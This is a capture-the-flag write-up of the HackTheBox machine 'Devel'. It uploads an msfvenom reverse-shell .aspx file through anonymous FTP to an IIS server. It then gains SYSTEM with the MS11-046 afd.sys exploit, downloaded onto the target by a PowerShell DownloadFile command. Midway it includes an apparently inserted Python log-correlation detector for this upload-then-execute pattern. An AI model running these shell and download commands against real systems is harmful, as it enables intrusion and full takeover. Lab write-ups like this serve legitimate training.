
HackTheBox - Devel

Although it’s been a while since my last upload due to getting a new job, I thought it was time to get back on the grind, starting with Devel. This was my second machine rooted without using Metasploit. This machine exploits a Windows web server with anonymous upload privileges via FTP enabled. Once inside, I used “afd.sys” (MS11-046) to escalate privileges and gain root!


  • Port scan using Nmap
  • Upload an MSFVenom-generated .aspx shell to the web server via FTP
  • Elevate privileges using ‘afd.sys’ to gain root

Machine IP:



nmap -n -p- -sV -T 5


FTP is open and so is port 80. Further enumeration:

nmap -p 80,21 -sC -sV -O


FTP anonymous login is allowed! Maybe we can exploit this? It also contains an aspnet_client directory. What is it?


Anonymous FTP is enabled. We also have the ability to upload files using PUT.


These are the files located within the FTP directory.




It seems the website is hosted in the same root directory as FTP, as the file “iisstart.htm” is reachable. Maybe we could upload something via FTP and access it via HTTP?

Create a simple test.html file and upload it via FTP.


Then, in the browser, navigate to


It works, confirming that files uploaded by FTP are served (and, where applicable, executed) by the web server when navigated to. The web server is Microsoft IIS 7.5.

Maybe we can upload a reverse shell via FTP and get the web server to execute it?

IIS 7.5

After some googling to find out more about IIS 7.5, I stumbled across this website.

It highlights that the webserver can do much more than host “ASP.NET apps”.

Okay, but what are ASP.NET apps? After some more googling, it seems they use the extension .aspx.

As per

An ASPX file is an Active Server Page Extended (ASPX) file, which is a webpage generated by web servers running the Microsoft ASP.NET framework.

Well, our web server is running the ASP.NET framework, so we could create a payload with the extension .aspx and get the web server to execute it!


So now that we know our web server executes .aspx files, we can create a payload using msfvenom with the .aspx extension and upload it to the root directory.

So first of all, let's check that .aspx is a valid output format for msfvenom.

msfvenom --list format | grep aspx


Both the aspx and aspx-exe formats are available, great!

Now let's find a Windows reverse shell. We will not use Meterpreter, as it is not available on the OSCP.

msfvenom --list payloads | grep windows/shell

windows/shell_reverse_tcp                  Connect back to attacker and spawn a command shell


Now let's create a .aspx payload called rshell.aspx:

msfvenom -p windows/shell_reverse_tcp -f aspx LHOST= LPORT=4444 -o rshell.aspx

and then upload it using FTP.

put rshell.aspx

Start a netcat listener on port 4444 (or any port you like, matching LPORT), and get the web server to execute the file by navigating to it in the browser.
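The chain this box relies on, an anonymous FTP upload (STOR) of a script file followed by an HTTP request for the same path, is also what a defender would look for in the IIS FTP-site and web-site logs. The following is an added example, not from the original write-up; the log lines are constructed and the W3C field order is an assumption:

```python
from datetime import datetime

# Constructed IIS FTP-site W3C log lines (field order is an assumption).
FTP_LOG = """\
#Fields: date time c-ip cs-username cs-method cs-uri-stem sc-status
2024-01-05 10:00:01 10.10.14.2 anonymous USER anonymous 331
2024-01-05 10:00:01 10.10.14.2 anonymous PASS *** 230
2024-01-05 10:00:05 10.10.14.2 anonymous STOR /test.html 226
2024-01-05 10:00:40 10.10.14.2 anonymous STOR /rshell.aspx 226
"""

# Constructed IIS web-site W3C log lines.
WEB_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem sc-status
2024-01-05 10:00:10 10.10.14.2 GET /test.html 200
2024-01-05 10:00:45 10.10.14.2 GET /rshell.aspx 200
2024-01-05 10:01:00 10.10.14.3 GET /iisstart.htm 200
"""

# Extensions IIS hands to the ASP.NET engine rather than serving as static files.
SCRIPT_EXTS = (".aspx", ".asp", ".ashx", ".asmx")

def parse_w3c(text):
    """Parse W3C extended log text into dicts keyed by the #Fields header."""
    fields, rows = [], []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#"):
            rows.append(dict(zip(fields, line.split())))
    return rows

def _ts(row):
    return datetime.strptime(row["date"] + " " + row["time"], "%Y-%m-%d %H:%M:%S")

def find_upload_then_execute(ftp_text, web_text, window_s=600):
    """Return (path, uploader_ip, requester_ip, delay_s) for every anonymous STOR
    of a script-extension file that is requested over HTTP within window_s."""
    uploads = [r for r in parse_w3c(ftp_text)
               if r["cs-method"] == "STOR" and r["cs-username"] == "anonymous"
               and r["cs-uri-stem"].lower().endswith(SCRIPT_EXTS)]
    gets = [r for r in parse_w3c(web_text) if r["cs-method"] == "GET"]
    hits = []
    for up in uploads:
        for g in gets:
            delay = (_ts(g) - _ts(up)).total_seconds()
            if g["cs-uri-stem"].lower() == up["cs-uri-stem"].lower() and 0 <= delay <= window_s:
                hits.append((up["cs-uri-stem"], up["c-ip"], g["c-ip"], delay))
    return hits
```

On the sample data only rshell.aspx is flagged; test.html is uploaded and fetched too but is static content, which is why the extension filter matters.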


Navigating to Users, we can see we have 2 accounts:

  • Admin
  • babis

However, we do not have access to either.


Time for some privilege escalation.

Privilege Escalation

System information

Let's start by finding out some information about our target machine:


It looks as though Windows 7 Enterprise version 6.1.7600 is running, and it has not been patched! Let's have a look for some exploits on Google.

This looks like exactly what we need. Let's have a look at the exploit notes:


It seems the exploit will be compiled on our host machine and then uploaded to the target machine before execution.


First, let's get the file onto our host machine. As the website shows the file is EDB verified, we should be able to find it in searchsploit.

searchsploit -m 40564

Rename the file to MS11-046.c using mv, and then run the compile command given within the exploit. Compilation will fail because our host system does not have mingw installed. We can install it using:

sudo apt-get install mingw-w64

Re-run the compile command, and it will succeed.


Great, we now have an executable! Now to get it on the target machine.


The target machine does not have netcat installed; however, it does have Windows PowerShell, so we will use that to connect back to our host machine and download the file.

Start with a simple Python HTTP server:

python -m SimpleHTTPServer 6666

and then, on the remote machine, use PowerShell to connect back to the host and download the file.

This website gives a good insight into how to do this using (new-object System.Net.WebClient).DownloadFile

powershell -c "(new-object System.Net.WebClient).DownloadFile('', 'c:\Users\Public\Downloads\MS11-046.exe')"

Navigate to C:\Users\Public\Downloads.


We can see the file is there! Execute it!


We have root!!


Here are the flags for this machine!

User: user

Root: Root

This post is licensed under CC BY 4.0 by the author.